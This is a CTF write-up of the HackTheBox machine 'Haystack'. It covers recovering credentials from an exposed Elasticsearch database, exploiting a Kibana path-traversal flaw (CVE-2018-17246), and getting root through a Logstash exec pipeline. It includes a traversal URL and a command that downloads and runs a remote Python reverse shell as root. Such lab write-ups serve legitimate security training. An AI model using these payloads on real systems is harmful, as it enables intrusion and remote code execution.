Haystack — HackTheBox Writeup
Haystack retires this week. It was an easy-difficulty box where we see some stego and get initial credentials from an Elasticsearch database. With those credentials we can SSH in, and by exploiting CVE-2018-17246 in Kibana, I get a shell as the kibana user. The kibana user has access to the Logstash config, which is misconfigured so that commands read from a log file are executed as root.

Enumeration and Recon
Let’s start off with an nmap scan,

We see that ports 22, 80 and 9200 are open. One thing to observe here is that port 80 returns text/html as its Content-Type, whereas port 9200 returns application/json, which suggests it is serving some kind of API, as APIs usually return data in JSON.
80 — HTTP
The website looks like this,

It has an image of a needle in a haystack, and that’s it. gobuster didn’t find anything interesting. Since this is a CTF challenge, I guessed that there must be something in the image, as it was the only thing on port 80. When I was first solving the box, I ran some basic steg tools and found nothing. One of my friends told me it’s simpler than that, so I ran the strings tool on it and found a base64 string. CTF they said, CTF it was.


Elasticsearch — 9200
It’s running Elasticsearch version 6.4.2. I read its documentation to get an overview of it.

I looked for ways to dump the database and stumbled upon https://github.com/taskrabbit/elasticsearch-dump.
Looking at the documentation, we can list the indices as described at
https://www.elastic.co/guide/en/elasticsearch/reference/6.4/getting-started-list-indices.html#getting-started-list-indices

We can see that we have two indices, quotes and bank. Let’s start dumping with elasticdump.

Let’s analyze the dumps that we’ve got. Keep in mind the hint from the quote: “the needle in the haystack is key”.

The last words of the quotes look like a base64 string.

Found credentials.
User: security
Pass: spanish.is.key
Shell as security

Privesc to Kibana
We can safely assume that we are working on an ELK stack, which stands for Elasticsearch, Logstash, Kibana.
Looking at the running processes, I can see that the box is running kibana and logstash as expected.
Since kibana is running internally, I port forward it with
ssh security@10.10.10.115 -L 5601:127.0.0.1:5601
We can see that it’s running Kibana 6.4.2. A quick Google search gets us to CVE-2018-17246.
https://github.com/mpgn/CVE-2018-17246
Shell as Kibana
Browsing to the url,
http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../../../../../../../../../tmp/test.js

To get an understanding of the ELK stack, we can look at the picture.

“ELK” is the acronym for three open source projects: Elasticsearch, Logstash, and Kibana. Elasticsearch is a search and analytics engine. Logstash is a server‑side data processing pipeline that ingests data from multiple sources simultaneously, transforms it, and then sends it to a “stash” like Elasticsearch. Kibana lets users visualize data with charts and graphs in Elasticsearch.
In a nutshell,
E — Elasticsearch — is the search and analytics engine
L — Logstash — Processes and stores logs
K — Kibana — A visualisation tool for data in Elasticsearch.
So up to now, we have dumped Elasticsearch and got a shell as the kibana user. My guess here is to look for interesting things in Logstash next.
Privesc to Root
Configuration files of logstash are present in /etc/logstash/conf.d

input.conf:
input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}
input.conf watches /opt/kibana/ for files with names like logstash_*, polling every ten seconds, and tags the events with type execute.
filter.conf:
filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}
If the type is execute and the message has the format Ejecutar comando: <command>, grok extracts everything after the colon into the comando field.
output.conf:
output {
  if [type] == "execute" {
    stdout { codec => json }
    exec {
      command => "%{comando} &"
    }
  }
}
According to output.conf, for every event of type execute the exec plugin runs the contents of the comando field as a shell command, and since Logstash runs as root, so does the command.
Having gathered all the information and having the right permissions, let us place our reverse shell in /opt/kibana/logstash_test.
Contents of logstash_test:
Ejecutar comando: curl 10.10.15.236/pyshell.py -o /tmp/kk.py;python /tmp/kk.py
Haystack rooted.
Thanks for reading,
Preetham.

